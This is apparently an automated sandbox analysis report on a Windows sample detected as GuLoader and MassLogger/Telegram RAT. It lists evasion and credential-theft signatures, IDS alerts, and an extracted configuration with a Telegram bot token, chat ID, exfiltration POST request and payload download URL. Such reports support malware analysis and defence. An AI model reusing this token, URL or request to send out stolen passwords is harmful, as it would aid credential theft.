Edit tour

Windows Analysis Report
b5BQbAhwVD.exe

Overview

General Information

Sample name:	b5BQbAhwVD.exe renamed because original name is a hash value
Original sample name:	d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b.exe
Analysis ID:	1588212
MD5:	8e4a2b26b311d9e5c9a920186b0b8025
SHA1:	f433a5c5020d31b0278b659e01cbb3882c671487
SHA256:	d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Disable Task Manager(disabletaskmgr)

Disables CMD prompt

Disables the Windows task manager (taskmgr)

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

b5BQbAhwVD.exe (PID: 1280 cmdline: "C:\Users\user\Desktop\b5BQbAhwVD.exe" MD5: 8E4A2B26B311D9E5C9A920186B0B8025)

b5BQbAhwVD.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\b5BQbAhwVD.exe" MD5: 8E4A2B26B311D9E5C9A920186B0B8025)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2385539475.0000000003DC5000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: b5BQbAhwVD.exe PID: 6424	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: b5BQbAhwVD.exe PID: 6424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: b5BQbAhwVD.exe PID: 6424	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:43:38.290741+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	49964	149.154.167.220	443	TCP
2025-01-10T22:43:40.403998+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	49978	149.154.167.220	443	TCP
2025-01-10T22:43:42.193783+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	49989	149.154.167.220	443	TCP
2025-01-10T22:43:44.155656+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	49992	149.154.167.220	443	TCP
2025-01-10T22:43:45.707079+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	49995	149.154.167.220	443	TCP
2025-01-10T22:43:47.355654+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	49997	149.154.167.220	443	TCP
2025-01-10T22:43:48.810566+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	49999	149.154.167.220	443	TCP
2025-01-10T22:43:50.501847+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50001	149.154.167.220	443	TCP
2025-01-10T22:43:52.514440+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50003	149.154.167.220	443	TCP
2025-01-10T22:43:53.963506+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50005	149.154.167.220	443	TCP
2025-01-10T22:43:55.399919+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50007	149.154.167.220	443	TCP
2025-01-10T22:43:56.922750+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50009	149.154.167.220	443	TCP
2025-01-10T22:43:58.556032+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50011	149.154.167.220	443	TCP
2025-01-10T22:44:00.306097+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50013	149.154.167.220	443	TCP
2025-01-10T22:44:01.880986+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50015	149.154.167.220	443	TCP
2025-01-10T22:44:03.565415+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50017	149.154.167.220	443	TCP
2025-01-10T22:44:05.137762+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50019	149.154.167.220	443	TCP
2025-01-10T22:44:06.769294+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50021	149.154.167.220	443	TCP
2025-01-10T22:44:08.473446+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50025	149.154.167.220	443	TCP
2025-01-10T22:44:10.067659+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50027	149.154.167.220	443	TCP
2025-01-10T22:44:11.615715+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50029	149.154.167.220	443	TCP
2025-01-10T22:44:13.222558+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50031	149.154.167.220	443	TCP
2025-01-10T22:44:14.906701+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50033	149.154.167.220	443	TCP
2025-01-10T22:44:16.461260+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50035	149.154.167.220	443	TCP
2025-01-10T22:44:18.073657+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50037	149.154.167.220	443	TCP
2025-01-10T22:44:19.745626+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50039	149.154.167.220	443	TCP
2025-01-10T22:44:21.411514+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50041	149.154.167.220	443	TCP
2025-01-10T22:44:23.038141+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50043	149.154.167.220	443	TCP
2025-01-10T22:44:24.633538+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50045	149.154.167.220	443	TCP
2025-01-10T22:44:26.106237+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50047	149.154.167.220	443	TCP
2025-01-10T22:44:27.698587+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50049	149.154.167.220	443	TCP
2025-01-10T22:44:29.441104+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50051	149.154.167.220	443	TCP
2025-01-10T22:44:30.987411+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50053	149.154.167.220	443	TCP
2025-01-10T22:44:32.503707+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50055	149.154.167.220	443	TCP
2025-01-10T22:44:33.964570+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50057	149.154.167.220	443	TCP
2025-01-10T22:44:35.501882+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50059	149.154.167.220	443	TCP
2025-01-10T22:44:37.002302+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50061	149.154.167.220	443	TCP
2025-01-10T22:44:38.669450+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50063	149.154.167.220	443	TCP
2025-01-10T22:44:40.277352+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50065	149.154.167.220	443	TCP
2025-01-10T22:44:41.777070+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50068	149.154.167.220	443	TCP
2025-01-10T22:44:43.444454+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50070	149.154.167.220	443	TCP
2025-01-10T22:44:45.313609+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50072	149.154.167.220	443	TCP
2025-01-10T22:44:46.861010+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50074	149.154.167.220	443	TCP
2025-01-10T22:44:48.356145+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50076	149.154.167.220	443	TCP
2025-01-10T22:44:50.021137+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50078	149.154.167.220	443	TCP
2025-01-10T22:44:51.657111+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50080	149.154.167.220	443	TCP
2025-01-10T22:44:53.187760+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.6	50082	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:43:30.402572+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49910	132.226.8.169	80	TCP
2025-01-10T22:43:37.277592+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49910	132.226.8.169	80	TCP
2025-01-10T22:43:39.340074+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49973	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:43:24.036995+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49869	142.250.186.142	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:43:37.911520+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49964	149.154.167.220	443	TCP
2025-01-10T22:43:39.938527+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49978	149.154.167.220	443	TCP
2025-01-10T22:43:41.885949+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49989	149.154.167.220	443	TCP
2025-01-10T22:43:43.707201+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49992	149.154.167.220	443	TCP
2025-01-10T22:43:45.360498+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49995	149.154.167.220	443	TCP
2025-01-10T22:43:46.930726+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49997	149.154.167.220	443	TCP
2025-01-10T22:43:48.575526+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49999	149.154.167.220	443	TCP
2025-01-10T22:43:50.047051+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50001	149.154.167.220	443	TCP
2025-01-10T22:43:52.277358+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50003	149.154.167.220	443	TCP
2025-01-10T22:43:53.729116+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50005	149.154.167.220	443	TCP
2025-01-10T22:43:55.173244+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50007	149.154.167.220	443	TCP
2025-01-10T22:43:56.652227+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50009	149.154.167.220	443	TCP
2025-01-10T22:43:58.160008+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50011	149.154.167.220	443	TCP
2025-01-10T22:43:59.932227+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50013	149.154.167.220	443	TCP
2025-01-10T22:44:01.623949+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50015	149.154.167.220	443	TCP
2025-01-10T22:44:03.134782+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50017	149.154.167.220	443	TCP
2025-01-10T22:44:04.758561+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50019	149.154.167.220	443	TCP
2025-01-10T22:44:06.367104+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50021	149.154.167.220	443	TCP
2025-01-10T22:44:08.066307+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50025	149.154.167.220	443	TCP
2025-01-10T22:44:09.672750+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50027	149.154.167.220	443	TCP
2025-01-10T22:44:11.303252+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50029	149.154.167.220	443	TCP
2025-01-10T22:44:12.813731+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50031	149.154.167.220	443	TCP
2025-01-10T22:44:14.526148+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50033	149.154.167.220	443	TCP
2025-01-10T22:44:16.120073+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50035	149.154.167.220	443	TCP
2025-01-10T22:44:17.685248+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50037	149.154.167.220	443	TCP
2025-01-10T22:44:19.289499+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50039	149.154.167.220	443	TCP
2025-01-10T22:44:20.978871+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50041	149.154.167.220	443	TCP
2025-01-10T22:44:22.609261+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50043	149.154.167.220	443	TCP
2025-01-10T22:44:24.287303+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50045	149.154.167.220	443	TCP
2025-01-10T22:44:25.834440+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50047	149.154.167.220	443	TCP
2025-01-10T22:44:27.319081+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50049	149.154.167.220	443	TCP
2025-01-10T22:44:28.908906+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50051	149.154.167.220	443	TCP
2025-01-10T22:44:30.704871+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50053	149.154.167.220	443	TCP
2025-01-10T22:44:32.205043+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50055	149.154.167.220	443	TCP
2025-01-10T22:44:33.725897+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50057	149.154.167.220	443	TCP
2025-01-10T22:44:35.183983+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50059	149.154.167.220	443	TCP
2025-01-10T22:44:36.713518+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50061	149.154.167.220	443	TCP
2025-01-10T22:44:38.299101+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50063	149.154.167.220	443	TCP
2025-01-10T22:44:39.887149+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50065	149.154.167.220	443	TCP
2025-01-10T22:44:41.504856+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50068	149.154.167.220	443	TCP
2025-01-10T22:44:43.037460+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50070	149.154.167.220	443	TCP
2025-01-10T22:44:44.746296+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50072	149.154.167.220	443	TCP
2025-01-10T22:44:46.512673+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50074	149.154.167.220	443	TCP
2025-01-10T22:44:48.048135+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50076	149.154.167.220	443	TCP
2025-01-10T22:44:49.593350+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50078	149.154.167.220	443	TCP
2025-01-10T22:44:51.329486+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50080	149.154.167.220	443	TCP
2025-01-10T22:44:52.859130+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	50082	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3195ed612844Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndn
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: b5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/3
Source: b5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/K
Source: b5BQbAhwVD.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.000000003396B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033957000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A2B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgra
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegramLR
Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/-40f1-ac21-573d1d5ce43f
Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/g
Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI
Source: b5BQbAhwVD.exe, 00000003.00000003.2509453504.0000000003241000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2476161231.0000000003248000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2509525856.0000000003246000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003211000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download
Source: b5BQbAhwVD.exe, 00000003.00000003.2476161231.0000000003248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download(
Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download8
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189es
Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
